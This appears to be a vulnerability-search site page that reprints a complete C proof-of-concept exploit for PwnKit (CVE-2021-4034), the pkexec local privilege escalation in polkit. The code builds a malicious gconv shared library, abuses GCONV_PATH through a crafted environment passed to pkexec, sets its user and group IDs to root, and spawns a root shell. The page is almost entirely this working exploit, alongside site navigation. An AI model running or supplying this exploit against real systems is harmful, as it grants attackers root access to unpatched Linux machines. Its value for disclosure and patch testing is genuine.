Recent Vulnerabilities Research Posts Trends Blog About Contact

Related Vulnerabilities: CVE-2021-4034 CVE-2021-4034

Publish Date: 26 Jan 2022

Source

                /*
 * Proof of Concept for PwnKit: Local Privilege Escalation Vulnerability Discovered in polkit’s pkexec (CVE-2021-4034) by Andris Raugulis &lt;moo@arthepsy.eu&gt;
 * Advisory: https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034
 */
#include &lt;stdio.h&gt;
#include &lt;stdlib.h&gt;
#include &lt;unistd.h&gt;

char *shell = 
  "#include &lt;stdio.h&gt;\n"
  "#include &lt;stdlib.h&gt;\n"
  "#include &lt;unistd.h&gt;\n\n"
  "void gconv() {}\n"
  "void gconv_init() {\n"
  "  setuid(0); setgid(0);\n"
  "  seteuid(0); setegid(0);\n"
  "  system(\"export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; rm -rf 'GCONV_PATH=.' 'pwnkit'; /bin/sh\");\n"
  "  exit(0);\n"
  "}";

int main(int argc, char *argv[]) {
  FILE *fp;
  system("mkdir -p 'GCONV_PATH=.'; touch 'GCONV_PATH=./pwnkit'; chmod a+x 'GCONV_PATH=./pwnkit'");
  system("mkdir -p pwnkit; echo 'module UTF-8// PWNKIT// pwnkit 2' &gt; pwnkit/gconv-modules");
  fp = fopen("pwnkit/pwnkit.c", "w");
  fprintf(fp, "%s", shell);
  fclose(fp);
  system("gcc pwnkit/pwnkit.c -o pwnkit/pwnkit.so -shared -fPIC");
  char *env[] = { "pwnkit", "PATH=GCONV_PATH=.", "CHARSET=PWNKIT", "SHELL=pwnkit", NULL };
  execve("/usr/bin/pkexec", (char*[]){NULL}, env);
}

<p>

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Twitter Reddit Linkedin Facebook

Polkit pkexec CVE-2021-4034 Proof Of Concept

Vulmon Search

About

Products

Connect